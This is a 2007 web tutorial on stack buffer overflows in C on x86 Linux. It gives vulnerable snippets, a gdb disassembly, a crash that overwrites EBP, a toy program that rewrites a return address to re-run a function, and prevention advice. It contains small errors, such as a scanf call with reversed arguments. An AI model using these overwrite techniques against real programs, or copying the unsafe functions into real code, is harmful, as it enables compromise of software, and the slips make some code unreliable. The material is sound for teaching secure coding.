Buffer Overflow

written by: Suhas Desai; article published: year 2007, month 04;



In: Categories » Computers and technology » Linux » Buffer Overflow

A buffer overflow occurs when a program or process tries to store more data in a temporary data storage area than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information can overflow into adjacent buffers, corrupting or overwriting the valid data held in them.

Buffer overflows are a fertile source of bugs and malicious attacks. They occur when a program attempts to write data past the end of a buffer. A buffer is a contiguous allocated chunk of memory, such as an array or pointer in C. Limitation of C and C++ is there are no automatic bounds checking on the buffer where user can write past a buffer as given in example.
Note: All examples are compiled on Linux platform having x86 configuration.

  int main () 
  {
  int buffer [10];
  buffer[20]=10;
  }

After execution of this program it won’t give errors but program attempts to write beyond the allocated memory for the buffer which results for unexpected output.
Example:

        void function (char *str) 
        {
               char buffer[16];
               strcpy(buffer,str);
        }
int main()
        {
        char *str=”I am greater than 16 bytes”;
        function(str);
        } 

This program is guaranteed to cause unexpected behavior, because a string (str) of 27 bytes has been copied to a location (buffer) that has been allocated for only 16 bytes. The extra bytes run past the buffer and overwrite the space allocated for the FP, return address and so on. This corrupts the process stack. The function used to copy the string is strcpy, which completes no checking of bounds. Using strncpy would have prevented this corruption of the stack.
Example:

int main()
        {
        char buff[15]={0};
        printf(“Enter your name:”);
        scanf(buff,”%s”);
        }

In this example, program reads a string from the standard input but does not check strings length. If the string has more than 14 characters, then it causes a buffer overflow as scanf() tries to write the remaining character past buff’s end.
Note: One character is always reserved for a null terminator.
The result is most likely a segmentation fault that crashes the program .In certain conditions, the users will receive a shell’s prompt after the crash. Even if the shell has restricted privileges, they can examine the values of environment variables; list the current directory files to detect the network with the pig command.
Writing Buffer Overflow exploits:
1. Example of an exploitable program - Lets assume that we exploit a function like this:

void lame (void) 
{ 
char small[30]; 
gets (small); 
printf("%sn", small);
}
main() 
{ 
lame (); 
return 0; 
}

Compile and disassemble it:

# cc -ggdb program.c -o program
/tmp/cca017401.o: In function `lame':
/root/program.c:1: the `gets' function is 
         dangerous and should not be used.
# gdb program
/* short explanation: gdb, the GNU debugger 
   is used here to read the
   binary file and disassemble it (translate 
   bytes to assembler code) */
(gdb) disas main
Dump of assembler code for function main:
0x80484c8 :     pushl  %ebp
0x80484c9 :     movl   %esp,%ebp
0x80484cb :     call     0x80484a0 
0x80484d0 :     leave
0x80484d1 :     ret
(gdb) disas lame
Dump of assembler code for function lame:
/* saving the frame pointer onto the stack 
   right before the ret address */
0x80484a0 :     pushl  %ebp
0x80484a1 :     movl   %esp,%ebp
/* enlarge the stack by 0x20 or 32. our buffer 
   is 30 characters, but the memory is allocated 
   4byte-wise (because the processor uses 32bit 
   words) this is the equivalent to: char small[30]; */
0x80484a3 :     subl   $0x20,%esp
/* load a pointer to small[30] (the space on 
   the stack, which is located at virtual 
   address 0xffffffe0(%ebp)) on the stack, and 
   call the gets function: gets(small); */
0x80484a6 :    leal      0xffffffe0(%ebp),%eax
0x80484a9 :    pushl   %eax
0x80484aa :    call      0x80483ec 
0x80484af :    addl     $0x4,%esp
/* load the address of small and the address of "%sn" 
   string on stack and call the print function: 
   printf("%sn", small); */
0x80484b2 :    leal   0xffffffe0(%ebp),%eax
0x80484b5 :    pushl  %eax
0x80484b6 :    pushl  $0x804852c
0x80484bb :    call   0x80483dc 
0x80484c0 :    addl   $0x8,%esp
/* get the return address, 0x80484d0, from stack 
  and return to that address. you don't see that 
  explicitly here because it is done by the CPU 
  as 'ret' */
0x80484c3 :    leave
0x80484c4 :    ret

End of assembler dump.
1.a. Overflowing the program

# ./program xxxxxxxxx <- user input xxxxxxxxxxxxx 
# ./program xxxxxxxxx <- user input xxxxxxxxxxxxx 
Segmentation fault (core dumped) # gdb program 
core (gdb) info registers eax: 0x24 36 ecx: 0x804852f 
134513967 edx: 0x1 1 ebx: 0x11a3c8 1156040 esp: 
0xbffffdb8 -1073742408 ebp: 0x787878 7895160 

EBP is 0x787878, this means that we have written more data on the stack than the input buffer could handle. 0x78 is the hex representation of 'x'. The process had a buffer of 32 bytes maximum size. We have written more data into memory than allocated for user input and therefore overwritten EBP and the return address with 'xxxx', and the process tried to resume execution at address 0x787878, which caused it to get a segmentation fault.
1.b. Changing the return address
Lets try to exploit the program to return to lame() instead of return. We have to change return address 0x80484d0 to 0x80484cb, that is all. In memory, we have: 32 bytes buffer space | 4 bytes saved EBP | 4 bytes RET. Here is a simple program to put the 4byte return address into a 1byte character buffer:

main()
{
int i=0; 
char buf[44];
for (i=0;i<=40;i+=4)
*(long *) &buf[i] = 0x80484cb;
puts(buf);
}
 
# ./program
test            <- user input
test

Here the program went through the function two times. If an overflow is present, the return address of functions can be changed to alter the programs execution thread.
Prevention:

1. Always check the bounds of an array before writing it to a buffer. If this is possible [eg when the input is coming from CGI script], then use functions that the number of input characters. For instance, instead of using scanf (), use the fgets () function which reads characters upto specified limit.
Example:

        int main()
        {
        char buff[15]={0};
        fgets(buff,sizeof(buff),stdin); 
    //reads at most 14 characters
        }

2. Additionaly, the standard string functions have versions that take on explicit size limit. Thus ,instead of strcpy(),strcmp() and sprintf() use strncpy(),strcmp(),snprint() respectively.

3. Stack execute invalidation:
Any code that attempts to execute any other code residing in the stack will cause a segmentation violation. Solution is not easy to solve this segmentation violation. Although it is possible in Linux, few compliers use trampoline functions to implement taking the address of a nested function that works on the system stack being executable. A trampoline is a small piece of code created at a run-time when the address of a nested function is taken. It normally resides in the stack, in the stack frame of the containing function and thus requires the stack to be executable.

4. Dynamic run-time checks:
This method primarily relies on the safety code being preloaded before an application is executed. This preloaded component can either provide safer versions of the standard unsafe functions, or it can ensure that return addresses are not overwritten. libsafe library provides secure calls to these functions, even if the function is not available. It makes use of the fact that stack frames are linked together by frame pointers. When a buffer is passed as an argument to any of the unsafe functions, libsafe follows the frame pointers to the correct stack frame. It then checks the distance to the nearest return address, and when the function executes, it makes sure that address is not overwritten.

Bibliography:

About the Author:
Suhas A Desai is working with Tech Mahindra Ltd. In his free time he writes on Open Source and Security. He can be reached at suhasde@techmahindra.com.

legal disclaimer

1) Our website is not responsible for the information contained by this article as well for any and all copyright infringements by authors and writers. E-articles is a free information resource. If you suspect this article for any copyright infringements, please read the Terms of service and contact us to investigate the problem.
2) The E-articles directory team is not responsible for inaccuracies, falsehoods, or any other types of misinformation this tutorial may contain and will not be liable for any loss or damage suffered by a user through the user's reliance on the information gained here. Please read the Terms of service

Useful tools and features

Translate this article to...    Send this article to you or to a friend

Link to this article from your page   
If you like this article (tutorial), please link to it from your web page using the information above. Linking to this page, this is the only way to help us improve our service, the same time providing your visitors with a way to improve their online experience.

related articles

1. Interactively transfer files from the command line with PSFTP
One method to transfer files from the Windows command line is to use PSFTP. PSFTP creates an interactive SFTP file transfer session where you can use many of the commands available within a normal FTP session. Since PSFTP uses the SFTP protocol, which is only available with servers running protocol SSHv2, you may not be able to run it on every server. PSFTP is run from the command line and provides numerous options. To see the options available run PSFTP with the –h option: ...

2. Using Plink to initiate an SSH session from the command line or a script
Using PuTTY from the command line will create an SSH interactive session. This may not be what we want if for example we need to remain at the Windows command line or we want to issue an SSH command from within a script. In order to satisfy these types of needs, PuTTY provides a tool called Plink. Plink is a command line tool that will allow you to log in to a remote machine using SSH and either create an SSH session or execute a command, all from the command line and without opening another window. Plink comes with many comma...

3. How to Generate a Key Pair Using OpenSSH
Problem: How can a key-pair be created in OpenSSH?STEP1: Generating your public/private key-pairThe ssh-keygen command is utilized to generate your public and private keys. OpenSSH provides authentication methods via a choice of three public key "cryptosystems": RSA1, RSA, and DSA. RSA1 works with SSHv1 while RSA and DSA are for SSHv2. RSA and DSA use different techniques for authenticating and have different capabilities, but for purposes of this guide, either will suffice.To create a key-pair, r...

4. Transfer files from the command line with PSCP
A second method to transfer files from a Windows command line prompt is to use PSCP. Unlike PSFTP, PSCP is not interactive and is designed to transfer files "in one shot" and then exit, much like OpenSSH's scp command. PSCP also allows you to specify wildcards within filenames (PSFTP does not). Additionally, PSCP will work with any SSH server as it is not dependent on SSHv2 being present. Note  PSCP will blindly copy files to the remote server, overwriting any files with the same name, without prompting for veri...

5. Create an SSH session from the command line using PuTTY
There are multiple ways to create an SSH session from the command line using PuTTY. The first way involves using the PuTTY program itself. PuTTY comes with a number of options that can be used to invoke the graphical PuTTY terminal from the command line. A description of these options is available within the PuTTY help file. To run PuTTY from the command line: Note  ...

6. Install SSH Windows Clients to Access Remote Machines Securely
Problem: Many times administrators will find themselves on a Windows machine with no way to access a remote server securely since Microsoft does not yet package an SSH client. There are a number of excellent tools available that provide SSH client connectivity from a Windows platform. A list of these tools is available at http://www.openSSH.com/windows.html. ...

7. How to use OpenSSH Passphrase Agents
Problem: Using public key authentication makes logging in to a server with SSH more secure, but less convenient due to having to type in a longer and more complex passphrase. STEP1: Use ssh-agent and ssh-add to store your private keys in memory To make public key authentication more convenient to use, the OpenSSH developers created the ssh-agent and ssh-add programs. These programs are designed to keep your private keys decrypted in memory for your current session. With ssh-agent, you will not ne...

8. LINUX r Services
rlogind and rshd are the remote login and remote shell daemon. These so-called r services use TCP ports 513 and 514, respectively. The RLOGIN protocol is described in RFC 1282 and RSH in RFC. The r services were developed at Berkeley to provide seamless ("Look, Ma—no password") authentication between trusted hosts and/or users. Authentication between client and server is based on the client IP address, TCP port, and client username. The client IP address and username must match an entry in either the system-wi...

9. Static Libraries
Static libraries are simply collections of object files arranged by the ar (archiver) utility. ar collects object files into one archive file and adds a table that tells which object files in the archive define what symbols. The linker, ld, then binds references to a symbol in one object file to the definition of that symbol in an object file in the archive. Static libraries use the suffix .a. You can convert a group of object files into a static library with a command like ar rcs libnam...